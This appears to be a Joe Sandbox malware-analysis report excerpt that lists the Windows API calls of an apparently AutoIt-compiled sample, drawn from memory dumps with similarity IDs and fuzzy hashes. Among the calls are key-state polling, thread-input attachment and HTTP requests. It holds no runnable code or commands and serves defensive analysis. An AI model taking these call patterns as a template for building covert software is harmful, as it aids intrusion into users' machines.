                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C84539
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C8453C
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C84563
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C84586
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C845FE
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C84648
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C84663
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C8467E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C84692
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C846AF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C5BB18
                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BB2C
                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00C5BB33
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BB42
                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C5BB54
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BB6D
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BB7F
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BBC4
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BBD9
                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C5ABA8,?,00000001), ref: 00C5BBE4
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23007
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4), ref: 00C22D4E
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: GetLastError.KERNEL32(00CC1DC4,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4,00CC1DC4), ref: 00C22D60
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23013
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2301E
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23029
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23034
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2303F
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2304A
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23055
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C23060
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2306E
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BF2AF9
                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00BF2B98
                                                                                                                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00BF2D7D
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C33A1B
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00C33A80
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C33AAD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                            • String ID: close all
                                                                                                                                                                                                                                                                            • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C689F2
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68A06
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C68A30
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C68A4A
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68A5C
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C68AA5
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C68AF5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                            • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                            • Opcode ID: 15ab3beabb872437f5e0e9ccec569893acf494d169544ab709d8f50a27daced6
                                                                                                                                                                                                                                                                            • Instruction ID: bb26ea9ac3eeb14d245dce42f67774584c54a6c776761166aeb1a105a20f07cb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ab3beabb872437f5e0e9ccec569893acf494d169544ab709d8f50a27daced6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD81D1719083049BCB34EF54C494ABEB3E8BF88310F584A1AF995D7291DF34DA49DB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00BF74D7
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7567: GetClientRect.USER32(?,?), ref: 00BF758D
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7567: GetWindowRect.USER32(?,?), ref: 00BF75CE
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7567: ScreenToClient.USER32(?,?), ref: 00BF75F6
                                                                                                                                                                                                                                                                            • GetDC.USER32 ref: 00C36083
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C36096
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C360A4
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C360B9
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00C360C1
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C36152
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                            • Opcode ID: 863de6543ff812949a1757269dbe8c0c41c356210fb0d1df16f575e0cbdec582
                                                                                                                                                                                                                                                                            • Instruction ID: 7fae53aa2b966528c113d534c661f540d77ccaddd4f4a1f403e739f94462d109
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 863de6543ff812949a1757269dbe8c0c41c356210fb0d1df16f575e0cbdec582
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D71BE31500209EFCF259F64C885ABE7BB5FF48320F1486A9ED665B2A6C7318944EF50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BF24B0
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetCursorPos.USER32(?), ref: 00BF19E1
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: ScreenToClient.USER32(00000000,?), ref: 00BF19FE
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetAsyncKeyState.USER32(00000001), ref: 00BF1A23
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF19CD: GetAsyncKeyState.USER32(00000002), ref: 00BF1A3D
                                                                                                                                                                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00C895C7
                                                                                                                                                                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 00C895CD
                                                                                                                                                                                                                                                                            • ReleaseCapture.USER32 ref: 00C895D3
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00C8966E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C89681
                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00C8975B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                            • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                            • Opcode ID: b103b0dc5595d6de39b67819c96bf5774b671e336b0329a9c002e78907577ae7
                                                                                                                                                                                                                                                                            • Instruction ID: cab50d7913ba19c1c2dac82bd39c296d22cdbbc8317ae07fd0a3d6cb9faddc28
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b103b0dc5595d6de39b67819c96bf5774b671e336b0329a9c002e78907577ae7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74516670204304AFD704EF24CC56FBA77E4EB88714F400A69FA96972E2DB709A08DB56
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6CCB7
                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C6CCDF
                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C6CD0F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C6CD67
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 00C6CD7B
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00C6CD86
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C355AE,?,?,Bad directive syntax error,00C8DCD0,00000000,00000010,?,?), ref: 00C5A236
                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00C355AE,?), ref: 00C5A23D
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C5A301
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                            • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 00C529F8
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00C52A0D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C52A9A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                            • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00BF758D
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00BF75CE
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00BF75F6
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00BF773A
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00BF775B
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7e7e1cf9ae23df58c62aae153ebef929e2e1d1bbdf79a6a795ca32264fde60c7
                                                                                                                                                                                                                                                                            • Instruction ID: 5cbc1993f7f4db5727a09f24122c9d1254b7e360801ddc204707991d288c2aa1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e7e1cf9ae23df58c62aae153ebef929e2e1d1bbdf79a6a795ca32264fde60c7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41614971904330EFDB22EF75F881BAD7BA49F22320F14016DF857A7A92D6319E409B91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00C85C24
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00C85C65
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00C85C6B
                                                                                                                                                                                                                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00C85C6F
                                                                                                                                                                                                                                                                              • Part of subcall function 00C879F2: DeleteObject.GDI32(00000000), ref: 00C87A1E
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C85CAB
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C85CB8
                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C85CEB
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00C85D25
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00C85D34
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                            • Opcode ID: 295edfdaccf0deaf41072b2eb9526f94baa7dd97438e4cf0276f87aff91f242e
                                                                                                                                                                                                                                                                            • Instruction ID: 9a8a3247f75c7a1e2b293fcb98fe9c414e09945bbf83548d83468eb0a2d2dea6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 295edfdaccf0deaf41072b2eb9526f94baa7dd97438e4cf0276f87aff91f242e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B519430640A08BFEF24AF15CC49FA93BA5FB04758F144112FA259A1E1C7F69A90DF49
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00C328D1
                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00C328EA
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C328FA
                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00C32912
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C32933
                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BF11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00C32942
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C3295F
                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BF11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00C3296E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4cb00d671c6207ef0d356d47ba2bfa755d35c90c59f3aeea0d31d7d77940ee16
                                                                                                                                                                                                                                                                            • Instruction ID: b91c865a0dc5bdc4682508b388ce282bbc50932f691ee02c6e7679de136a0d52
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cb00d671c6207ef0d356d47ba2bfa755d35c90c59f3aeea0d31d7d77940ee16
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7515870610309EFDB24DF29CC85BAA7BF5EB88720F104958FA52976E0D770E994EB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C6CBC7
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C6CBDA
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 00C6CBEE
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6CCB7
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6CC98: GetLastError.KERNEL32 ref: 00C6CD67
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6CC98: SetEvent.KERNEL32(?), ref: 00C6CD7B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6CC98: InternetCloseHandle.WININET(00000000), ref: 00C6CD86
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 337547030-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2918673b9747b6b509081b722daf39a42b10775dee835ade81ba168ce54695a0
                                                                                                                                                                                                                                                                            • Instruction ID: a3a900025505b0930263461d3bbeecd06fc9828f3481751cdc8f2c8c46d305d7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2918673b9747b6b509081b722daf39a42b10775dee835ade81ba168ce54695a0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08316971601705BFDB319FA5DDC4B7ABBB8FF48300B04452DF9AA82650CB31E914ABA0
                                                                                                                                                                                                                                                                            APIs
